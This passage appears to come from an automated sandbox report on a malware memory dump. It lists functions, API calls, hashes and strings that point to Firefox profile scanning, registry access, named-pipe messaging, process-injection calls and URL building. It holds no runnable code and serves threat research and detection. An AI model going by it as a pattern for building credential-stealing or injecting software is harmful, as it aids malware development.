    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5C23, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59 Total matches: 27stringtime
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6C08, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141 Total matches: 19registrysynchronization
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3F95, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80 Total matches: 37memorystring
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
